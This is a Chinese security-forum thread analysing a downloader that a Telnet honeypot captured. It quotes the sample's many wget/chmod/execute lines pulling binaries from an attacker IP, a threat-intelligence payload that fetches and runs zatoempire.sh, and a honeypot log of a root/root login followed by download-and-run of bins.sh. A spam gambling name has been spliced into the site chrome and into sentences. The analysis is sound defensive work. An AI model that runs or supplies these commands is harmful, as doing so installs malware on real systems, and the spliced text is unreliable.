2025年最靠谱的六合彩投注网软件

登录| 注册
2025年最靠谱的六合彩投注网软件»论坛 六合彩官方服务 六合彩技术探讨 记录蜜罐捕获到的一个样本分析
六合彩技术探讨
发新帖
打印 上一主题 下一主题

[六合彩技术] 记录蜜罐捕获到的一个样本分析

[复制链接]
1232 4
楼主
发表于 2024-6-10 08:08:43 | 只看该作者 |倒序浏览 |阅读模式
跳转到指定楼层
本帖最后由 NIKA 于 2024-6-10 08:10 编辑

今天晚上一看,已经有18个样本被蜜罐捕获(高交互Telnet蜜罐)了,主要就是这个样本:

  1. <p>文件HASH如下:</p>
  2. <p>MD5:f42a6178e5da4e16254ecbdec5ca376a</p>
  3. <p>SHA-1:51ad642c254d762e3c775678aa17e28601b57866</p>
  4. <p>SHA-256:a093105ec49c25547511780526165a00e0d8964bd622ed2127982908379f198e</p>
复制代码

上传至virustotal检测,62报23

接下来六合彩对攻击IP进行溯源分析,威胁情报查询如下:

访问该IP(是一个Apache安装成功的测试页):

接下来继续着眼于该样本,由于是一个文本文件,六合彩提取文件内容如下:
  1. #母样本内容如下:
  2. cd /tmp; wget <http://178.215.236.209/M>; chmod 777 M; ./M; rm -rf M
  3. cd /tmp; wget <http://178.215.236.209/MS>; chmod 777 MS; ./MS; rm -rf MS
  4. cd /tmp; wget <http://178.215.236.209/SH>; chmod 777 SH; ./SH; rm -rf SH
  5. cd /tmp; wget <http://178.215.236.209/x86>; chmod 777 x86; ./x86; rm -rf x86
  6. cd /tmp; wget <http://178.215.236.209/A6>; chmod 777 A6; ./A6; rm -rf A6
  7. cd /tmp; wget <http://178.215.236.209/I6>; chmod 777 I6; ./I6; rm -rf I6
  8. cd /tmp; wget <http://178.215.236.209/PPC>; chmod 777 PPC; ./PPC; rm -rf PPC
  9. cd /tmp; wget <http://178.215.236.209/I5>; chmod 777 I5; ./I5; rm -rf I5
  10. cd /tmp; wget <http://178.215.236.209/M68>; chmod 777 M68; ./M68; rm -rf M68
  11. cd /tmp; wget <http://178.215.236.209/A5>; chmod 777 A5; ./A5; rm -rf A5
  12. cd /tmp; wget <http://178.215.236.209/PPC-440>; chmod 777 PPC-440; ./PPC-440; rm -rf PPC-440
  13. cd /tmp; wget <http://178.215.236.209/A4-TL>; chmod 777 A4-TL; ./A4-TL; rm -rf A4-TL
  14. cd /tmp; wget <http://178.215.236.209/I4>; chmod 777 I4; ./I4; rm -rf I4
  15. cd /tmp; wget <http://178.215.236.209/M64>; chmod 777 M64; ./M64; rm -rf M64
复制代码

不难看出,该样本只是一个下载器,用于下载178.215.236.209 下的一些文件到/tmp目录,并通过chmod 777 命令修改文件可执行权限,并运行下载的这些样本 ./文件 ,并且在子样本运行结束后删除样本,清理痕迹。
接下来六合彩对该IP进行威胁情报查询,结果如下:

发现该IP一直存在通过恶意软件进行攻击的行为。并获取到了其攻击payload:
178.215.236.209的攻击Payload信息: 渗透攻击行为:传播恶意木马 攻击Payload信息详情:
  1. ["["sh","cd /tmp || wget <http://178.215.236.209/zatoempire.sh>; curl -O <http://178.215.236.209/zatoempire.sh>; chmod 777 zatoempire.sh; sh zatoempire.sh; rm -rf *.sh"]"]
复制代码

不难看出,其大概率通过此payload将样本上传至蜜罐的。去蜜罐验证一下,找到该IP的攻击记录:

该IP的请求包如下:
  1. New connection: 188.166.242.49:41462 (172.30.51.1:23) [session: a8c9cd97e13a]
  2. login attempt [root/root] succeeded
  3. sh
  4. cd /tmp; wget <http://178.215.236.209/bins.sh> ||
  5. curl -O <http://178.215.236.209/bins.sh> && chmod 777 bins.sh && ./bins.sh; rm -rf *
  6. Connection lost after 17 seconds
复制代码

手法基本相似,样本文件名被修改了,威胁情报的http://178.215.236.209/zatoempire.sh 现已无法访问。
到目前六合彩可以得到该攻击的基本信息如下:
到目前六合彩可以得到该攻击的基本信息如下:
[code]<p>
本主题由 六合彩运营专员 于 2024-6-25 10:43 添加图标 已解决
回复

使用道具 举报

1232 4
沙发
发表于 2024-6-10 10:09:50 | 只看该作者
您好,您提供的信息已收到,六合彩分析确认看下,感谢反馈~
回复

使用道具 举报

1232 4
板凳
发表于 2024-6-10 12:28:50 | 只看该作者
六合彩运营专员 发表于 2024-6-10 10:09
您好,您提供的信息已收到,六合彩分析确认看下,感谢反馈~

六合彩目前已经可以查杀了
回复

使用道具 举报

1232 4
地板
发表于 2024-6-10 12:32:12 | 只看该作者
NIKA 发表于 2024-6-10 12:28
六合彩目前已经可以查杀了

感谢您的回复~
回复

使用道具 举报

1232 4
5#
发表于 2024-6-30 15:24:31 | 只看该作者
小白询问一下楼主 你的蜜罐是怎么部署的
回复

使用道具 举报

返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | [立即注册]

本版积分规则

版权所有©2011-20242025年最靠谱的六合彩投注网 All Rights Reserved

官方网站 | 加入六合彩 | 站点统计

快速回复 返回顶部 返回列表